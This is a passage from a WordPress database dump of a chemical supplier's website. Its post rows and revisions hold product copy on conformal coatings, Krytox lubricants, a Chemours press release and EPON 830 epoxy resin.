all other contaminants. Contamination under the coating could cause problems that may lead to assembly failures.\r\n\r\n<strong>Miller-Stephenson has been manufacturing and formulating conformal coatings for over 50 years, we have the technical and application expertise to help your team choose, apply, and re-work any conformal coating within our portfolio.  We offer both commercial and MIL-spec coatings, and all of our coatings are held to highest performance standards.  When choosing any of our conformal coating you can expect the following benefits:</strong>\r\n<ul>\r\n 	<li>Simple application- Convenient aerosol or bulk</li>\r\n 	<li>Specialized formulas to provide uniform, thin films</li>\r\n 	<li>Easy removal, repair and replacement</li>\r\n 	<li>100% non-flammable; low odor formulations</li>\r\n 	<li>Superior Protection against thermal and mechanical shock</li>\r\n 	<li>MIL-Spec and Commerical-Spec polymer coatings</li>\r\n</ul>\r\n[ux_product_categories ids="29,28,27,30" number="10"]\r\n\r\nOur entire line of conformal coatings can be found <a href="https://www.miller-stephenson.com/chemicals/conformal-coatings/">here.</a>', 'Choosing the Right Conformal Coating', '', 'inherit', 'closed', 'closed', '', '2474-revision-v1', '', '', '2016-11-17 20:22:31', '2016-11-17 20:22:31', '', 2474, 'https://www.miller-stephenson.com/2474-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3061, 0, '2016-11-17 22:16:02', '2016-11-17 22:16:02', '', '', '', 'publish', 'closed', 'closed', '', '3061', '', '', '2016-11-17 22:16:02', '2016-11-17 22:16:02', '', 0, 'https://www.miller-stephenson.com/nf_sub/3061/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3062, 177, '2016-11-17 23:16:34', '2016-11-17 23:16:34', '', '', '', 'publish', 'closed', 'closed', '', '3062', '', '', '2016-11-17 23:16:34', '2016-11-17 23:16:34', '', 0, 'https://www.miller-stephenson.com/nf_sub/3062/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3063, 0, '2016-11-18 10:11:39', '2016-11-18 10:11:39', '', '', '', 'publish', 'closed', 'closed', '', '3063', '', '', '2016-11-18 10:11:39', '2016-11-18 10:11:39', '', 0, 'https://www.miller-stephenson.com/nf_sub/3063/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3064, 2, '2016-11-18 14:22:38', '2016-11-18 14:22:38', '<h3>Chemours Introduces Krytox™ FPG 182 Performance Lubricant for Clean Rooms, Robotics and Electronic Manufacturing</h3>\r\nWilmington, Del., November 17, 2016 – The Chemours Company (“Chemours”) (NYSE: CC), a global chemistry company with leading market positions in titanium technologies, fluoroproducts and chemical solutions, announced today the introduction of its new Krytox™ FPG 182 performance lubricant.\r\n\r\nKrytox™ FPG 182 is a smooth, buttery, perfluoropolyether (PFPE)-based grease thickened with a special, high-performance polytetrafluoroethylene (PTFE). Developed to operate over a wide temperature range (–80 °C to 210 °C ; –112 °F to 410 °F) and in extreme chemical and vacuum conditions, Krytox™ FPG 182 can be used for bearings, gears, and as a lubricant for O-rings and elastomers. It offers exceptional resistance to oxygen and chemicals and prevents corrosion.\r\n\r\nKrytox™ FPG 182 provides improved wear resistance, reduced oil volatility and smaller solid thickener particle size versus competing products. In tests, it demonstrated seven times the bearing life compared to similar products (5,400+ hr. at 10,000 rpm and 399 °F).\r\n\r\n“For decades, the Krytox™ family of lubricants has set the standard for high-performance industrial greases,” said Jennifer Bricker, Global Product Manager. “Krytox™ lubricants help extend machinery life without the many downsides of hydrocarbon-based oils and greases, including flammability and product deterioration. Krytox™ FPG 182 further builds on the high-temperature capabilities of the Krytox™ line.”\r\n\r\n<a href="https://www.miller-stephenson.com/product/krytox-fpg-182/">Available in 50 and 100g syringes, 8 oz. tubes, and 1.76 lb. cartridges.</a>\r\n\r\n[ux_product_categories ids="160" number="10"]', 'Chemours Introduces Krytox™ FPG 182 Performance Lubricant', '', 'publish', 'closed', 'closed', '', 'krytox-fpg-182-performance-lubricant', '', '', '2016-11-18 14:35:46', '2016-11-18 14:35:46', '', 0, 'https://www.miller-stephenson.com/?p=3064', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (3065, 2, '2016-11-18 14:18:37', '2016-11-18 14:18:37', '', 'FPG 182', '', 'inherit', 'closed', 'closed', '', 'shutterstock_422528992', '', '', '2016-11-18 14:18:58', '2016-11-18 14:18:58', '', 3064, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_422528992.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (3066, 2, '2016-11-18 14:22:38', '2016-11-18 14:22:38', '<h3>Chemours Introduces Krytox™ FPG 182 Performance Lubricant for Clean Rooms, Robotics and Electronic Manufacturing</h3>\r\nWilmington, Del., November 17, 2016 – The Chemours Company (“Chemours”) (NYSE: CC), a global chemistry company with leading market positions in titanium technologies, fluoroproducts and chemical solutions, announced today the introduction of its new Krytox™ FPG 182 performance lubricant.\r\n\r\nKrytox™ FPG 182 is a smooth, buttery, perfluoropolyether (PFPE)-based grease thickened with a special, high-performance polytetrafluoroethylene (PTFE). Developed to operate over a wide temperature range (–80 °C to 210 °C ; –112 °F to 410 °F) and in extreme chemical and vacuum conditions, Krytox™ FPG 182 can be used for bearings, gears, and as a lubricant for O-rings and elastomers. It offers exceptional resistance to oxygen and chemicals and prevents corrosion.\r\n\r\nKrytox™ FPG 182 provides improved wear resistance, reduced oil volatility and smaller solid thickener particle size versus competing products. In tests, it demonstrated seven times the bearing life compared to similar products (5,400+ hr. at 10,000 rpm and 399 °F).\r\n\r\n“For decades, the Krytox™ family of lubricants has set the standard for high-performance industrial greases,” said Jennifer Bricker, Global Product Manager. “Krytox™ lubricants help extend machinery life without the many downsides of hydrocarbon-based oils and greases, including flammability and product deterioration. Krytox™ FPG 182 further builds on the high-temperature capabilities of the Krytox™ line.”\r\n\r\n<a href="https://www.miller-stephenson.com/product/krytox-fpg-182/">Available in 50 and 100g syringes, 8 oz. tubes, and 1.76 lb. cartridges.</a>\r\n\r\n[ux_product_categories number="10" parent="0" columns="4" title="Krytox FPG" ]', 'Chemours Introduces Krytox™ FPG 182 Performance Lubricant', '', 'inherit', 'closed', 'closed', '', '3064-revision-v1', '', '', '2016-11-18 14:22:38', '2016-11-18 14:22:38', '', 3064, 'https://www.miller-stephenson.com/3064-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3067, 2, '2016-11-18 14:23:18', '2016-11-18 14:23:18', '<h3>Chemours Introduces Krytox™ FPG 182 Performance Lubricant for Clean Rooms, Robotics and Electronic Manufacturing</h3>\n<p>Wilmington, Del., November 17, 2016 – The Chemours Company (“Chemours”) (NYSE: CC), a global chemistry company with leading market positions in titanium technologies, fluoroproducts and chemical solutions, announced today the introduction of its new Krytox™ FPG 182 performance lubricant.</p>\n<p>Krytox™ FPG 182 is a smooth, buttery, perfluoropolyether (PFPE)-based grease thickened with a special, high-performance polytetrafluoroethylene (PTFE). Developed to operate over a wide temperature range (–80 °C to 210 °C ; –112 °F to 410 °F) and in extreme chemical and vacuum conditions, Krytox™ FPG 182 can be used for bearings, gears, and as a lubricant for O-rings and elastomers. It offers exceptional resistance to oxygen and chemicals and prevents corrosion.</p>\n<p>Krytox™ FPG 182 provides improved wear resistance, reduced oil volatility and smaller solid thickener particle size versus competing products. In tests, it demonstrated seven times the bearing life compared to similar products (5,400+ hr. at 10,000 rpm and 399 °F).</p>\n<p>“For decades, the Krytox™ family of lubricants has set the standard for high-performance industrial greases,” said Jennifer Bricker, Global Product Manager. “Krytox™ lubricants help extend machinery life without the many downsides of hydrocarbon-based oils and greases, including flammability and product deterioration. Krytox™ FPG 182 further builds on the high-temperature capabilities of the Krytox™ line.”</p>\n<p><a href="https://www.miller-stephenson.com/product/krytox-fpg-182/">Available in 50 and 100g syringes, 8 oz. tubes, and 1.76 lb. cartridges.</a></p>\n[ux_product_categories ids="160" number="10"]', 'Chemours Introduces Krytox™ FPG 182 Performance Lubricant', '', 'inherit', 'closed', 'closed', '', '3064-revision-v1', '', '', '2016-11-18 14:23:18', '2016-11-18 14:23:18', '', 3064, 'https://www.miller-stephenson.com/3064-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3068, 2, '2016-11-18 14:35:46', '2016-11-18 14:35:46', '<h3>Chemours Introduces Krytox™ FPG 182 Performance Lubricant for Clean Rooms, Robotics and Electronic Manufacturing</h3>\r\nWilmington, Del., November 17, 2016 – The Chemours Company (“Chemours”) (NYSE: CC), a global chemistry company with leading market positions in titanium technologies, fluoroproducts and chemical solutions, announced today the introduction of its new Krytox™ FPG 182 performance lubricant.\r\n\r\nKrytox™ FPG 182 is a smooth, buttery, perfluoropolyether (PFPE)-based grease thickened with a special, high-performance polytetrafluoroethylene (PTFE). Developed to operate over a wide temperature range (–80 °C to 210 °C ; –112 °F to 410 °F) and in extreme chemical and vacuum conditions, Krytox™ FPG 182 can be used for bearings, gears, and as a lubricant for O-rings and elastomers. It offers exceptional resistance to oxygen and chemicals and prevents corrosion.\r\n\r\nKrytox™ FPG 182 provides improved wear resistance, reduced oil volatility and smaller solid thickener particle size versus competing products. In tests, it demonstrated seven times the bearing life compared to similar products (5,400+ hr. at 10,000 rpm and 399 °F).\r\n\r\n“For decades, the Krytox™ family of lubricants has set the standard for high-performance industrial greases,” said Jennifer Bricker, Global Product Manager. “Krytox™ lubricants help extend machinery life without the many downsides of hydrocarbon-based oils and greases, including flammability and product deterioration. Krytox™ FPG 182 further builds on the high-temperature capabilities of the Krytox™ line.”\r\n\r\n<a href="https://www.miller-stephenson.com/product/krytox-fpg-182/">Available in 50 and 100g syringes, 8 oz. tubes, and 1.76 lb. cartridges.</a>\r\n\r\n[ux_product_categories ids="160" number="10"]', 'Chemours Introduces Krytox™ FPG 182 Performance Lubricant', '', 'inherit', 'closed', 'closed', '', '3064-revision-v1', '', '', '2016-11-18 14:35:46', '2016-11-18 14:35:46', '', 3064, 'https://www.miller-stephenson.com/3064-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3069, 0, '2016-11-18 17:09:37', '2016-11-18 17:09:37', '', '', '', 'publish', 'closed', 'closed', '', '3069', '', '', '2016-11-18 17:09:38', '2016-11-18 17:09:38', '', 0, 'https://www.miller-stephenson.com/nf_sub/3069/', 0, 'nf_sub', '', 0); 
INSERT INTO `wp_posts` VALUES (3070, 3, '2016-11-18 19:22:18', '2016-11-18 19:22:18', '<p class="Section1">EPON 830 is a slightly higher molecular weight BPA liquid epoxy as compared to EPON 828. The resin itself is resistant to crystallization and also in blends with HELOXY™Modifiers.   EPON Resin 830 is somewhat higher in viscosity than EPON Resin 828, although the viscosity is still easily handled. It provides greater reactivity when combined with most curing agents.</p>\n<p class="Section1"> <strong>Application Areas/Suggested Uses</strong></p>\n\n<div class="Section1">\n<ul>\n 	<li>Industrial floor toppings and grouting</li>\n 	<li>High build glaze, sealer or gel coats</li>\n 	<li>General purpose casting and encapsulation</li>\n 	<li>Base resin for dilution with Heloxy Modifiers</li>\n</ul>\n</div>\n<strong>Benefits</strong>\n<ul>\n 	<li>Slightly higher viscosity than standard liquid epoxy</li>\n 	<li>Very good resistance to crystallization</li>\n 	<li>Higher reactivity at room temperature</li>\n 	<li>Low color</li>\n 	<li>Good chemical resistance</li>\n</ul>\nSpecifications\n<table border="1" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="211">Property</td>\n<td valign="top" width="72">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="132">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Weight per Epoxide</td>\n<td valign="top" width="72">\n<p align="center">g/eq</p>\n</td>\n<td valign="top" width="132">\n<p align="center">190 – 198</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1652</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Viscosity at 25°C</td>\n<td valign="top" width="72">\n<p align="center">P</p>\n</td>\n<td valign="top" width="132">\n<p align="center">170 – 225</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D445</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Color</td>\n<td valign="top" width="72">\n<p align="center">Gardner</p>\n</td>\n<td valign="top" width="132">\n<p align="center">1 max.</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1544</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">&nbsp;</td>\n<td valign="top" width="72">\n<p align="center"></p>\n</td>\n<td valign="top" width="132">\n<p align="center"></p>\n</td>\n<td valign="top" width="175">\n<p align="center"></p>\n</td>\n</tr>\n</tbody>\n</table>\n&nbsp;\n\n<strong>Typical Properties</strong>\n<table border="1" cellspacing="0" cellpadding="3">\n<tbody>\n<tr>\n<td valign="top" width="211">Property</td>\n<td valign="top" width="72">\n<p align="center">Units</p>\n</td>\n<td valign="top" width="132">\n<p align="center">Value</p>\n</td>\n<td valign="top" width="175">\n<p align="center">Test Method/Standard</p>\n</td>\n</tr>\n<tr>\n<td valign="top" width="211">Density at 25°C</td>\n<td valign="top" width="72">\n<p align="center">lb/gal</p>\n</td>\n<td valign="top" width="132">\n<p align="center">9.7</p>\n</td>\n<td valign="top" width="175">\n<p align="center">ASTM D1475</p>\n</td>\n</tr>\n</tbody>\n</table>\nEPON 830 liquid epoxy resins when properly formulated and cured provide an inert end-product with a unique combination of properties. They are suitable for use in high performance applications such as coatings, adhesives, civil engineering, electronic and electrical insulation, composites and fiber sizing. Cured EPON resins are generally regarded as being high strength materials, since many commonly used systems provide tensile strengths greater than 10,000 psi and modulus values greater than 400,000 psi. One of the most widely recognized applications of cured EPON Resin 830 is strong adhesion to a broad range of substrates. Such systems exhibit shear strength of up to 6,000 psi (41 Mpa). One factor which contributes to this property is the low shrinkage shown by these systems during cure.\n\nMiller-Stephenson is an Epon 830 Supplier and certified from Hexion for direct distribution, technical support, and formulation modifications. <a href="https://www.miller-stephenson.com/tech-support/">For Technical Service Question please click here</a>', 'EPON™  830', 'EPON Resin 830 is a slightly higher molecular weight BPA liquid epoxy as compared to EPON 828. The resin itself is resistant to crystallization and also in blends with HELOXY™Modifiers. EPON Resin 830 is somewhat higher in viscosity than EPON Resin 828, although the viscosity is still easily handled. It provides greater reactivity when combined with most curing agents.  Benefits include:\n<ul>\n 	<li>Industrial floor toppings and grouting</li>\n 	<li>High build glaze, sealer or gel coats</li>\n 	<li>General purpose casting and encapsulation</li>\n 	<li>Base resin for dilution with Heloxy Modifiers</li>\n</ul>', 'inherit', 'closed', 'closed', '', '882-autosave-v1', '', '', '2016-11-18 19:22:18', '2016-11-18 19:22:18', '', 882, 'https://www.miller-stephenson.com/882-autosave-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3071, 2, '2016-11-19 16:16:44', '2016-11-19 16:16:44', '<h3>Krytox High Performance Greases &amp; Oils Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV joints, U-joints, splined shafts, and commercial electrical switches.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-anticorrosion/">GPL 22X</a></td>\r\n<td>The GPL 22X series contains sodium nitrite corrosion/ anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;">GPL 29X</td>\r\n<td>The GPL 29X greases have EP and anti-corrosion additives and have been formulated for high temperature applications that need both high load carrying capacity and anti-corrosion protection.</td>\r\n<td>Typical applications include slow-speed conveyor bearings that are subjected to vibration, moist conditions, or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"> GPL 2EX</td>\r\n<td>The GPL 2E(X) lubricants are formulated using new anti-rust additives. This grease is similar to the GPL 22X series greases, but contains a non-nitrite anticorrosion additive that is the salt of an organic acid. The new additives are effective at low concentration levels, are environmentally friendly, and do not pose any restrictions on long-term recyclability of the grease.</td>\r\n<td>Typical applications are automotive bearings, sealed pump bearings, electric motor bearings, and general purpose bearings.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/"><strong>Lubricants for Aerospace Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/aerospace-aviation-oils/">143</a></td>\r\n<td colspan="2">Krytox 143 series oils are clear, colorless fluorinated synthetic oils that are non-reactive, nonflammable, safe in chemical and oxygen service, and long-lasting.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-240/">240</a></td>\r\n<td colspan="2">Krytox 240 series greases are white, buttery greases with all of the same properties as the 143 series oils that they are made from, but they are in grease form. The 240 AZ, 240 AB, and 240 AC meet MIL-PRF-27617 general specifications. Many of the other 240 series products meet other specifications for individual applications.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-250-series/">250</a></td>\r\n<td colspan="2">Krytox 250 series EP greases are black greases that contain molybdenum disulfide added as an extreme pressure additive for highly loaded gears and bearings.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-aerospace/krytox-aerospace-aviation-greases/krytox-283-series/">283</a></td>\r\n<td colspan="2">Krytox 283 series anti-corrosion greases are white greases that contain sodium nitrite. These grades provide rust protection at ambient temperatures, corrosion protection at high temperatures, and anti-wear protection.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/"><strong>Lubricants for Extended Performance Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xp-oil/">XP 1A series oils/XP 2A series greases</a></td>\r\n<td colspan="2">The XP lubricant line offers greases and oils with a soluble additive in the oil. It will not be washed away or left behind with the grease thickener. These new patented additives enhance the performance of PFPE greases and oils, giving them improved performance properties. Bearings run quieter and wear less, because there are no solid additives to make noise. Lower wear will extend bearing and component life. The anti-corrosion protection of the additive will reduce rusting and allow longer grease and bearing life. The extreme pressure properties of the additive protect bearings under high loads. These products can be used in any lubrication application.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/"><strong>Lubricating Fluids for Vacuum Pump Applications</strong></a></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-lvp-vpf/">Vacuum Pump Fluids</a></td>\r\n<td colspan="2">The Vacuum pump fluids are used in vacuum pumps and systems, and are used when controlled vapor pressure, nonflammability and non-reactivity are needed. These products can be regenerated back to original properties and reused.</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>L<a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/">ubricants for Extra High Temperature Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-s-series/">XHT- S, SX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with all elastomers and plastics. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-ac/">XHT- AC, ACX</a></td>\r\n<td colspan="2">This grease is a special high temperature grease with low oil evaporation that provides long bearing life and is compatible with most elastomers and plastics. This grease contains sodium nitrite corrosion/anti-wear inhibitor and is ideal for corrosive environments where there is no danger of the sodium nitrite additive reacting with chemicals or causing contamination problems. It has excellent lubrication over a broad temperature range, but is designed to work best between temperatures of 200–300 °C (400–572 °F). It is nonflammable, oxygen compatible, and chemically inert.</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-xht/krytox-xht-grease/krytox-xht-bd/">XHT- BD, BDX, BDZ</a></td>\r\n<td colspan="2">This grease is designed for use where the temperatures are in the 300 °C (572 °F) range and higher where there is a danger of melting the standard PTFE thickener. This grease uses a special non-melting high temperature thickener that also provides extreme pressure properties and works as a solid lubricant if the base oil is depleted. The base oil is an extremely viscous oil that provides good viscosity and lower evaporation at high temperatures. The grease is slightly tacky and will coat the surface and stay in place. The oil in the grease can begin to slowly degrade at temperatures above 330 °C (625 °F), and this will occur at an increasing rate as temperatures increase. Re-lubrication could be required at these temperatures to achieve optimum life. Maximum use temperatures for these greases are 360 °C (680 °F) with intermittent spikes to 400 °C (752 °F).</td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong>Krytox Lubricants for Specialty Applications</strong></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-246/">GPL 246</a></td>\r\n<td>GPL 206 with copper added, so it will conduct electricity.</td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-gpl-407/">GPL 407</a></td>\r\n<td colspan="2">A silica thickened non-melting thickener for low speed applications in conveyors and other such applications where temperatures might cause PTFE melting.</td>\r\n</tr>\r\n<tr>\r\n<td>GPL 577</td>\r\n<td colspan="2">A grease containing a special EP additive and anti-corrosion additives for use under high loads where corrosion might be a factor</td>\r\n</tr>\r\n<tr>\r\n<td><a href="https://www.miller-stephenson.com/product/krytox-lvp/">LVP</a></td>\r\n<td colspan="2">A special high vacuum grease for applications where outgassing must be avoided. This is used in high vacuum industries and for sealing joints in laboratory applications</td>\r\n</tr>\r\n<tr>\r\n<td>XP 2C5</td>\r\n<td colspan="2">The XP 2C5 grease contains an oil soluble additive that is effective at preventing corrosion and reducing wear. It also contains an extreme pressure additive. Typical applications include those in potentially corrosive atmospheres, where vibration or shock loading may be significant and where an element will spend more time experiencing mixed film or boundary lubrication versus the desired full film or hydrodynamic lubrication.</td>\r\n</tr>\r\n<tr>\r\n<td>XHT EP 298 and EP 299</td>\r\n<td colspan="2">These greases have been formulated for high-temperature applications that need both high load carrying capacity and anti-corrosion protection. Typical applications include conveyor chains that are subjected to moist conditions or frequent temperature cycling that could allow condensation and rusting to occur.</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\nTo learn more about food grade applications <a href="https://www.miller-stephenson.com/krytox-h-1-food-grade-lubricants/">click here.</a>\r\n\r\nFor Automotive solutions <a href="https://www.miller-stephenson.com/krytox-automotive-lubricants/">click here.</a>\r\n\r\nKrytox <a href="https://www.miller-stephenson.com/krytox-faq/">FAQ.</a>\r\n\r\n<a href="https://www.miller-stephenson.com/mil-prf-27617-greases/">MIL PRF 27617 Greases</a>\r\n\r\n<strong>\r\nTO BROWSE OUR KRYTOX CATALOG, SELECT A CATEGORY BELOW:</strong>\r\n[product_categories number="12" ids="34,35,156,40,37,38,36,165,39,168,160,143" columns="4" title="Lubricants, Greases and Oils"]\r\n\r\nKrytox™ is  a trademark of <a href="https://www.chemours.com/">The Chemours Company</a> FC, LLC.\r\n\r\n&nbsp;', 'Krytox Application Overview', '', 'inherit', 'closed', 'closed', '', '2050-revision-v1', '', '', '2016-11-19 16:16:44', '2016-11-19 16:16:44', '', 2050, 'https://www.miller-stephenson.com/2050-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (3072, 2, '2016-11-19 16:27:34', '2016-11-19 16:27:34', '<h3>Krytox High-Performance Greases &amp; Oils Application Overview</h3>\r\nDiscovered in 1959, the polymer that would become known worldwide as Krytox showed remarkable thermal and oxidative stability. Potential uses envisioned then included lubricant for the MACH 3+ turbine engine, hydraulic oil, rocket gear box lubricant, and even gyroscope oil.\r\n\r\nIn 1963, Krytox oil was used in a GE engine test for the supersonic transport aircraft. In 1964, new perfluoropolyether (PFPE)-based grease formulations were developed jointly with the U.S. Navy and Air Force, resulting in military specification MIL-G-27617, which was developed specifically for Krytox. The first commercial sales of Krytox were for nonflammable lubricants for the Apollo space program in 1965.\r\n\r\nPrior to 1981, the only commercially available Krytox lubricants were aerospace oil and greases. Since then, PFPE-based oils and greases have been adopted across a very wide range of industries and applications. There are PFPE oils and greases for industrial operations, vacuum pump fluids, incidental food contact, automotive uses, reactive gas, and, of course, military applications—to name just a few.\r\n\r\nToday, of course, it’s our well-known trademark for high-performance synthetic lubricants used for a variety of applications. The oils are made from only fluorine, carbon, and oxygen—a mixture of compounds collectively known by many names—including PFPE, perfluoroalkylether (PFAE), and perfluoropolyalkylether (PFPAE). These perfluorinated oils and greases deliver high performance, perform at wide temperature ranges, and provide superior quality lubrication under extreme conditions in comparison to hydrocarbon alternatives. And, with a global distribution network and world-class technical service, it is the lubricant of choice for extreme conditions and performance.\r\n\r\nThe use of Chemours unique PTFE thickener provides superior chemical and thermal stability to all Krytox grease product lines. Many greases are also available with additional anti-wear and anti-corrosion additives to further boost performance in critical operations.\r\n\r\nKrytox performance lubricants provide superior performance and extended life as lubricants, sealants, and dielectrics. With exceptional performance and reliability in the toughest conditions—where productivity matters and downtime costs, it can contribute significantly to lowering the cost of doing business.\r\n<table width="1455">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" colspan="3" width="1455"><b>Krytox Performance Lubricants</b></td>\r\n</tr>\r\n<tr>\r\n<td colspan="3"><strong><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">General Purpose Applications</a></strong></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/">GPL 10X Oil / 20X Grease</a></td>\r\n<td>The GPL 10X oil/20X grease series contains no additives and can be used on components that come in contact with chemicals.</td>\r\n<td>Typical applications include valves or bearings in contact with chemicals, seal barrier fluids, instruments, and oxygen systems.</td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: left;"><a href="https://www.miller-stephenson.com/chemicals/lubricants/krytox-lubricants/krytox-gpl-series/krytox-gpl-greases/krytox-gpl-extreme-pressure/">GPL 21X</a></td>\r\n<td>The GPL 21X series contains molybdenum disulfide for extreme pressure (EP) conditions and should be used for slow speed or heavily loaded applications where there is no danger of the molybdenum disulfide additive reacting with chemicals or causing contamination.</td>\r\n<td>Typical applications include highly loaded gears, CV 